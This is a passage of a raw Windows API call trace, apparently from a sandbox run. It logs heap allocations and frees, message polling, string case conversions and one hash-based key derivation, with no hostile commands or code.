(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.391] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.391] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0258.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.392] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.392] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.392] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.393] CryptHashData (hHash=0xaa5760, pbData=0x24b1728, dwDataLen=0x3, dwFlags=0x1) returned 1 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.394] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.395] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.395] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.395] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.396] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0258.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.399] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: 